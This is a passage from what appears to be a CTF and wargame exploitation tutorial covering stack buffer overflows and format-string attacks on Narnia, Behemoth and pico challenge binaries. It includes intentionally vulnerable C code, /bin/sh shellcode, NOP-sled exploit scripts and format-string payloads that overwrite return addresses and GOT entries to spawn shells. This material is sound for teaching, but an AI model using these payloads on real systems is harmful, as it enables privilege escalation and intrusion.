<div><div class="highlight-default"><div class="highlight"><pre><span></span>./a.out $(python -c &#39; print &quot;A&quot; \* Offset + &quot;Address of give\_shell in hex&quot;&#39; )
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

/* This never gets called! */
void give_shell(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
     system(&quot;/bin/sh -i&quot;);
}

void vuln(char *input){
     char buf[16];
     strcpy(buf, input);
}

int main(int argc, char **argv){
     if (argc &gt; 1)
        vuln(argv[1]);
        return 0;
}
</pre></div>
</div>
</div></blockquote>
</div></blockquote>
<ul class="simple">
<li>Execute Me: If you check the below code, getegid() function shall return the effective group ID of the calling process., setresuid() sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process. If you see, read function read the stdin into the buffer and (function_ptf) buf() function is called which would call anything in the buffer.</li>
</ul>
<blockquote>
<div><ul>
<li><p class="first">Since, buf will execute anything, we need a shell code to fit in 128 bytes, There are plenty of shellcode (with different platforms and different working)which can be found on Shell-Storm.</p>
</li>
<li><p class="first">Then, we just need to pass the input to the program by</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>./a.out $(python -c &#39; print &quot;A&quot; \* Offset + &quot;Address of give\_shell in hex&quot;&#39; )
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>

<span class="nb">int</span> <span class="n">token</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="n">typedef</span> <span class="n">void</span> <span class="p">(</span><span class="o">*</span><span class="n">function_ptr</span><span class="p">)();</span>

<span class="n">void</span> <span class="n">be_nice_to_people</span><span class="p">(){</span>
    <span class="n">gid_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
    <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
         <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>

         <span class="n">be_nice_to_people</span><span class="p">();</span>
         <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>
         <span class="p">((</span><span class="n">function_ptr</span><span class="p">)</span><span class="n">buf</span><span class="p">)();</span>
 <span class="p">}</span>
</pre></div>
</div>
</li>
</ul>
</div></blockquote>
<ul class="simple">
<li>ROP1: This binary is running on a machine with ASLR! (Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.) Can you bypass it?</li>
</ul>
<blockquote>
<div><ul class="simple">
<li>From the code provided we can see that there’s a buffer overflow in the vuln() function due to the strcpy() call. run the program within gdb and see what the state of the registers and the stack are at the time of the crash.</li>
<li>From the cylic patterns tools, we could find that offset is at 76 which could be confirmed by providing a input of 76 “A”s and 4 “B”s to overwrite EIP. set a breakpoint after the call to strcpy(); that is *vuln+24. After the leave instruction is executed, EIP will be set to 0x424242.</li>
<li>EAX points to our buffer of “A”s and since the binary doesn’t have the NX bit, we can execute shellcode on the stack. To bypass ASLR, we just need to find an address that will do a JMP/CALL EAX and set that as our return address. msfelfscan can find a list of instructions to accomplish this:</li>
<li>Since the binary is compiled for 32 bit, searching the shellcode in Shellstorm for Linux_x86 executing /bin/sh, we get 21 bytes shellcode in kernelpanic.</li>
<li>As EAX contains the 76*A + BBBB when the vuln function returns, we just need to find address which will execute JMP EAX, it can be found by msfelfscan -j eax binary_file</li>
<li>One more small but important observation is the number of NOPs, as our shellcode is 21 bytes and offset is 76 bytes and jmp is 4 bytes. So, 76 - 21 - 4 = 51.</li>
</ul>
<blockquote>
<div><div class="code python highlight-default"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">struct</span>
<span class="n">code</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80</span><span class="s2">&quot;</span>
<span class="n">jmpeax</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;&lt;I&quot;</span><span class="p">,</span><span class="mh">0x080483e7</span><span class="p">)</span>
<span class="nb">print</span> <span class="s2">&quot;</span><span class="se">\x90</span><span class="s2">&quot;</span><span class="o">*</span><span class="mi">51</span> <span class="o">+</span> <span class="n">code</span> <span class="o">+</span> <span class="n">jmpeax</span>
</pre></div>
</div>
<div class="code C highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>

<span class="n">void</span> <span class="n">be_nice_to_people</span><span class="p">(){</span>
     <span class="n">gid_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
     <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">);</span>
 <span class="p">}</span>

<span class="n">void</span> <span class="n">vuln</span><span class="p">(</span><span class="n">char</span> <span class="o">*</span><span class="n">name</span><span class="p">){</span>
     <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
     <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
    <span class="n">be_nice_to_people</span><span class="p">();</span>
    <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span>
       <span class="n">vuln</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
       <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
</div></blockquote>
</div></blockquote>
</div>
<div class="section" id="format-string-examples">
<h2>Format String Examples<a class="headerlink" href="#format-string-examples" title="Permalink to this headline">¶</a></h2>
<p>Let&#8217;s see a simple example of a format string vulnerabilty.</p>
<ul class="simple">
<li>Narnia5</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdio</span><span class="o">.</span><span class="n">h</span><span class="o">&gt;</span>
<span class="n">include</span> <span class="o">&lt;</span><span class="n">stdlib</span><span class="o">.</span><span class="n">h</span><span class="o">&gt;</span>
<span class="n">include</span> <span class="o">&lt;</span><span class="n">string</span><span class="o">.</span><span class="n">h</span><span class="o">&gt;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> \<span class="o">*</span>\<span class="o">*</span><span class="n">argv</span><span class="p">){</span>
     <span class="nb">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
     <span class="n">snprintf</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">sizeof</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
     <span class="n">buffer</span><span class="p">[</span><span class="n">sizeof</span> <span class="p">(</span><span class="n">buffer</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
     <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Change i&#39;s value from 1 -&gt; 500. &quot;</span><span class="p">);</span>

     <span class="k">if</span><span class="p">(</span><span class="n">i</span><span class="o">==</span><span class="mi">500</span><span class="p">){</span>
       <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;GOOD</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
       <span class="n">system</span><span class="p">(</span><span class="s2">&quot;/bin/sh&quot;</span><span class="p">);</span>
     <span class="p">}</span>

     <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;No way...let me give you a hint!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
     <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;buffer : [</span><span class="si">%s</span><span class="s2">] (</span><span class="si">%d</span><span class="s2">)</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span>
     <span class="n">printf</span> <span class="p">(</span><span class="s2">&quot;i = </span><span class="si">%d</span><span class="s2"> (%p)</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">i</span><span class="p">);</span>
     <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>Let&#8217;s try to see what&#8217;s on stack and if we can put something on stack and change the value of i.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia5@melinda:~$ /narnia/narnia5
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i&#39;s value from 1 -&gt; 500.
No way...let me give you a hint! buffer :
[f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.62653766.36656436.6666662e.] (63) i
= 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i&#39;s value from 1 -&gt;
      500. No way...let me give you a hint! buffer :
      [AAAAf7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.41414141.62653766.36656] (63) i
      = 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c &#39;print &quot;\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x&quot;&#39;``
      Change i&#39;s value from 1 -&gt; 500. No way...let me give you a hint! buffer
      : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.ffffd6cc.62653766.36656] (63)
      i = 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c &#39;print &quot;\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08n.%08x.%08x.%08x&quot;&#39;``
      Change i&#39;s value from 1 -&gt; 500. No way...let me give you a hint! buffer
      : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8..62653766.36656436.6666] (63)
      i = 40 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c &#39;print &quot;\xcc\xd6\xff\xff%08x.%08x.%08x.%468x.%08n.%08x.%08x.%08x&quot;&#39;``
      Change i&#39;s value from 1 -&gt; 500. GOOD $
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>In this example, let&#8217;s see use of arbitary writing an address Narnia7</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;unistd.h&gt;</span>

<span class="nb">int</span> <span class="n">goodfunction</span><span class="p">();</span>
<span class="nb">int</span> <span class="n">hackedfunction</span><span class="p">();</span>

<span class="nb">int</span> <span class="n">vuln</span><span class="p">(</span><span class="n">const</span> <span class="n">char</span> <span class="o">*</span><span class="nb">format</span><span class="p">){</span>
        <span class="n">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
        <span class="nb">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ptrf</span><span class="p">)();</span>

        <span class="n">memset</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;goodfunction() = %p</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">goodfunction</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;hackedfunction() = %p</span><span class="se">\n\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">hackedfunction</span><span class="p">);</span>

        <span class="n">ptrf</span> <span class="o">=</span> <span class="n">goodfunction</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;before : ptrf() = %p (%p)</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">ptrf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ptrf</span><span class="p">);</span>

        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;I guess you want to come to the hackedfunction...</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
        <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
        <span class="n">ptrf</span> <span class="o">=</span> <span class="n">goodfunction</span><span class="p">;</span>

        <span class="n">snprintf</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">sizeof</span> <span class="n">buffer</span><span class="p">,</span> <span class="nb">format</span><span class="p">);</span>

        <span class="k">return</span> <span class="n">ptrf</span><span class="p">();</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;=</span> <span class="mi">1</span><span class="p">){</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s2">&quot;Usage: </span><span class="si">%s</span><span class="s2"> &lt;buffer&gt;</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
                <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">vuln</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]));</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">goodfunction</span><span class="p">(){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Welcome to the goodfunction, but i said the Hackedfunction..</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
        <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">hackedfunction</span><span class="p">(){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Way to go!!!!&quot;</span><span class="p">);</span>
    <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
        <span class="n">system</span><span class="p">(</span><span class="s2">&quot;/bin/sh&quot;</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>If we see, the program provides us with the address of the ptrf pointer, goodfunction and bad function. The ptrf is assigned the address of goodfunction if we somehow change it to address of the badfunction, we can get a shell. Let&#8217;s run the program and see what are the address we get.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">./</span><span class="n">narnia71</span> <span class="n">A</span>
<span class="n">goodfunction</span><span class="p">()</span> <span class="o">=</span> <span class="mh">0x804871f</span>
<span class="n">hackedfunction</span><span class="p">()</span> <span class="o">=</span> <span class="mh">0x8048745</span>

<span class="n">before</span> <span class="p">:</span> <span class="n">ptrf</span><span class="p">()</span> <span class="o">=</span> <span class="mh">0x804871f</span> <span class="p">(</span><span class="mh">0xffb4450c</span><span class="p">)</span>
<span class="n">I</span> <span class="n">guess</span> <span class="n">you</span> <span class="n">want</span> <span class="n">to</span> <span class="n">come</span> <span class="n">to</span> <span class="n">the</span> <span class="n">hackedfunction</span><span class="o">...</span>
<span class="n">Welcome</span> <span class="n">to</span> <span class="n">the</span> <span class="n">goodfunction</span><span class="p">,</span> <span class="n">but</span> <span class="n">i</span> <span class="n">said</span> <span class="n">the</span> <span class="n">Hackedfunction</span><span class="o">..</span>
</pre></div>
</div>
<p>and</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia7@melinda:/narnia$ ./narnia7 A
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd64c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..
</pre></div>
</div>
<p>The reason I have added two running instances is because in the first instance the address is different by one byte 0x1f and 0x45 where as in the second instance the address differs by two bytes 0x86e0 and 0x8706. We can write two bytes by %hn and one byte by %hhn. We can write whole 4 byte address by following a formula</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>If HOB &lt; LOB

HOB:0x0804
LOB:0x8706

[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x   = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn   = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]$hn = %7\$hn

`python -c &#39;print &quot;\x4e\xd6\xff\xff\x4c\xd6\xff\xff&quot; +&quot;%.2044x%6\$hn %.32514x%7\$hn&quot;&#39;`
</pre></div>
</div>
<p>We also need to find the offset where the address is stored which can be done by two methods: Either compiling the program on local machine and checking the buffer just after snprintf</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb-peda$ p buffer
$2 = &quot;AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030&quot;, &#39;\000&#39; &lt;repeats 51 times&gt;
</pre></div>
</div>
<p>or by using ltrace</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia7@melinda:/narnia$ ltrace ./narnia7 `python -c &#39;print &quot;AAAA&quot; + &quot;.%08x&quot;*7&#39;`
__libc_start_main(0x804868f, 2, 0xffffd764, 0x8048740 &lt;unfinished ...&gt;
memset(0xffffd620, &#39;\0&#39;, 128)                                                                                          = 0xffffd620
printf(&quot;goodfunction() = %p\n&quot;, 0x80486e0goodfunction() = 0x80486e0
)                                                                             = 27

)                                                                         = 30
printf(&quot;before : ptrf() = %p (%p)\n&quot;, 0x80486e0, 0xffffd61cbefore : ptrf() = 0x80486e0 (0xffffd61c)
)                                                           = 41
puts(&quot;I guess you want to come to the &quot;...I guess you want to come to the hackedfunction...
printf(&quot;hackedfunction() = %p\n\n&quot;, 0x8048706hackedfunction() = 0x8048706
)                                                                            = 50
sleep(2)                                                                                                               = 0
snprintf(&quot;AAAA.08048238.ffffd678.f7ffda94.&quot;..., 128, &quot;AAAA.%08x.%08x.%08x.%08x.%08x.%0&quot;..., 0x8048238, 0xffffd678, 0xf7ffda94, 0, 0x80486e0, 0x41414141, 0x3038302e) = 67
puts(&quot;Welcome to the goodfunction, but&quot;...Welcome to the goodfunction, but i said the Hackedfunction..
)                                                                            = 61
fflush(0xf7fcaac0)                                                                                                     = 0
exit(0 &lt;no return ...&gt;
+++ exited (status 0) +++
</pre></div>
</div>
<p>If you see 0x41414141 is at offset 6.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb-peda$ p ptrf
$3 = (int (*)()) 0x804871f &lt;goodfunction&gt;
gdb-peda$ p &amp;ptrf
$4 = (int (**)()) 0xffffd2ec
gdb-peda$ x /10xb 0xfffd3ea
0xfffd3ea:  Cannot access memory at address 0xfffd3ea
gdb-peda$ x /10xb 0xffffd3ea
0xffffd3ea: 0x3f    0x77    0x00    0x00    0x00    0x00    0x00    0x00
0xffffd3f2: 0x00    0x00
gdb-peda$ x /10xb 0xffffd2ea
0xffffd2ea: 0x04    0x08    0x1f    0x87    0x04    0x08    0x41    0x41
0xffffd2f2: 0x41    0x41
gdb-peda$ p goodfunction
$5 = {int ()} 0x804871f &lt;goodfunction&gt;
gdb-peda$ p ha
hackedfunction  hasmntopt
gdb-peda$ p hackedfunction
$6 = {int ()} 0x8048745 &lt;hackedfunction&gt;
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb-peda$ p &amp;ptrf
$10 = (int (**)()) 0xffffd2fc
gdb-peda$ run `python -c &#39;print &quot;\xfc\xd2\xff\xff&quot; + &quot;.%08x&quot;*5 + &quot;%hhn&quot;&#39;`
gdb-peda$ p ptrf
$12 = (int (*)()) 0x8048731 &lt;goodfunction+18&gt;
gdb-peda$ x /10xb 0xffffd2fa
0xffffd2fa: 0x04    0x08    0x31    0x87    0x04    0x08    0xfc    0xd2
0xffffd302: 0xff    0xff
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Let&#8217;s see another example Behemoth3 where we have only the assembly code of the program and we exploit this by two methods by overwriting the GOT address or overwriting the return address.</li>
</ul>
<blockquote>
<div><p>Assembly Source Code:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) disassemble main
Dump of assembler code for function main:
   0x0804847d &lt;+0&gt;: push   %ebp
   0x0804847e &lt;+1&gt;: mov    %esp,%ebp
   0x08048480 &lt;+3&gt;: and    $0xfffffff0,%esp
   0x08048483 &lt;+6&gt;: sub    $0xe0,%esp
   0x08048489 &lt;+12&gt;:    movl   $0x8048570,(%esp)
   0x08048490 &lt;+19&gt;:    call   0x8048330 &lt;printf@plt&gt;
   0x08048495 &lt;+24&gt;:    mov    0x80497a4,%eax
   0x0804849a &lt;+29&gt;:    mov    %eax,0x8(%esp)
   0x0804849e &lt;+33&gt;:    movl   $0xc8,0x4(%esp)
   0x080484a6 &lt;+41&gt;:    lea    0x18(%esp),%eax
   0x080484aa &lt;+45&gt;:    mov    %eax,(%esp)
   0x080484ad &lt;+48&gt;:    call   0x8048340 &lt;fgets@plt&gt;
   0x080484b2 &lt;+53&gt;:    movl   $0x8048584,(%esp)
   0x080484b9 &lt;+60&gt;:    call   0x8048330 &lt;printf@plt&gt;
   0x080484be &lt;+65&gt;:    lea    0x18(%esp),%eax
   0x080484c2 &lt;+69&gt;:    mov    %eax,(%esp)
   0x080484c5 &lt;+72&gt;:    call   0x8048330 &lt;printf@plt&gt;
   0x080484ca &lt;+77&gt;:    movl   $0x804858e,(%esp)
   0x080484d1 &lt;+84&gt;:    call   0x8048350 &lt;puts@plt&gt;
   0x080484d6 &lt;+89&gt;:    mov    $0x0,%eax
   0x080484db &lt;+94&gt;:    leave
   0x080484dc &lt;+95&gt;:    ret
End of assembler dump.
</pre></div>
</div>
<p>Observed Behavior:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>behemoth3@melinda:/tmp/rahul3$ ./behemoth3
Identify yourself: HelloCheck123
Welcome, HelloCheck123

aaaand goodbye again.
</pre></div>
</div>
<p>Well, we tried to provide a very large input to the Identify yourself, but it didn&#8217;t not gave a segmentation fault. Let&#8217;s try format string:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>behemoth3@melinda:/tmp/rahul3$ echo `python -c &#39;print &quot;A&quot;*4 + &quot;.%08x&quot;*7&#39;` | ./behemoth3
Identify yourself: Welcome, AAAA.000000c8.f7fcac20.00000000.00000000.f7ffd000.41414141.3830252e

aaaand goodbye again.
</pre></div>
</div>
<p>Trying simple format string provided us with the offset of our format string. Now we can write almost any address with any value with our input. Before that let&#8217;s put a environment variable shellcode and check it&#8217;s address:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>export EGG=`python -c &#39;print &quot;\x90&quot;*90 + &quot;\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80&quot;&#39;`
</pre></div>
</div>
<p>Let&#8217;s core dump the binary using %s and examine the core. Our shellcode can be reached at 0xffffd8f0</p>
<ul class="simple">
<li>Either we can overwrite the return address (main+95): Let&#8217;s debug the program set the breakpoint at main+95 and see the value of $esp which would be use to find the return address when binary is executed without gdb. The valueis 0xf7e3ba63 and the return address which needed to be overwrriten is 0xffffd65c. Let&#8217;s again core dump the binary to see the return address without gdb.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) find $esp,+2000,0xf7e3ba63
0xffffd66c
1 pattern found.
</pre></div>
</div>
<p>So, if we overwrite the return address at 0xffffd66c with our shellcode value of 0xffffd8f0, we should get a shell.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;</span><span class="se">\x5e\xd6\xff\xff\x5c\xd6\xff\xff</span><span class="s1">&quot; +&quot;</span><span class="si">%.65527x</span><span class="s1">%6$hn </span><span class="si">%.55503x</span><span class="s1">%7$hn&quot;&#39;</span> <span class="o">&gt;</span> <span class="n">input98</span>
</pre></div>
</div>
<p>This is little tricky because we might have to guess the return address without gdb. Previously it was coming 0xffffd66c but we got shell using 0xffffd65c.</p>
</div></blockquote>
<ul class="simple">
<li>overwrite the puts GOT address: Find the GOT address of puts which is 0x08049790 and overwrite it with</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39;print &quot;</span><span class="se">\x92\x97\x04\x08\x90\x97\x04\x08</span><span class="s1">&quot; +&quot;</span><span class="si">%.65527x</span><span class="s1">%6$hn </span><span class="si">%.55503x</span><span class="s1">%7$hn&quot;&#39;</span>
</pre></div>
</div>
</div></blockquote>
</div></blockquote>
<ul class="simple">
<li>In the below code, if we can somehow set the value of secret to 1337, we can get a shell on the system to read the flag. Also, the printf function directly prints the argument whatever is passed by the user. By concepts above, we need to find the address of secret and write to it. Address of the secret can be found by gdb or objdump. Either the address would be already present on stack or it can be put on stack.</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;fcntl.h&gt;</span>

<span class="nb">int</span> <span class="n">secret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="n">void</span> <span class="n">give_shell</span><span class="p">(){</span>
    <span class="n">gid_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
    <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s2">&quot;/bin/sh -i&quot;</span><span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
    <span class="nb">int</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">secret</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">secret</span> <span class="o">==</span> <span class="mi">1337</span><span class="p">){</span>
        <span class="n">give_shell</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>Reading the address</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>pico83515@shell:/home/format$ gdb -q format
Reading symbols from format...(no debugging symbols found)...done.
(gdb) p $secret
$1 = void
(gdb) p &amp;secret
$2 = (&lt;data variable, no debug info&gt; *) 0x804a030 &lt;secret&gt;
</pre></div>
</div>
<p>Now we have to find whether is this address present on the stack? If not, we can put this address on the stack because of the format string vulnerability.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>pico83515@shell:/home/format$ ./format %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
ffffd774.ffffd780.f7e4f39d.f7fc83c4.f7ffd000.0804852b.0804a030.08048520.00000000
</pre></div>
</div>
<p>We see that the address is present on the stack at the seventh position. Otherwise, we can put it on the stack by</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>for i in {1..256};do echo -n &quot;Offset: $i:&quot;; env -i ./format AAAA%$i\$x;echo ;done | grep 4141
</pre></div>
</div>
<p>What this is doing is &#8220;Extracting particular stack content by &#8220;%$i$x&#8221;. As we have seen in DMA, $x can be used to extract particular stack content and reading it. $i value changes from 1-256. However, as you add more data, the offset of your original input changes, so go ahead and add 1333 more bytes of data and see what the offset is then. (1337 is what we want to put into secret, and we will have written four bytes (AAAA), so 1333+4 = 1337)</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>or i in {1..256};do echo -n &quot;Offset: $i:&quot;; env -i ./format AAAA%$i\$x%1333u;echo ;done | grep 4141
Offset: 103:AAAA41410074
Offset: 104:AAAA31254141
</pre></div>
</div>
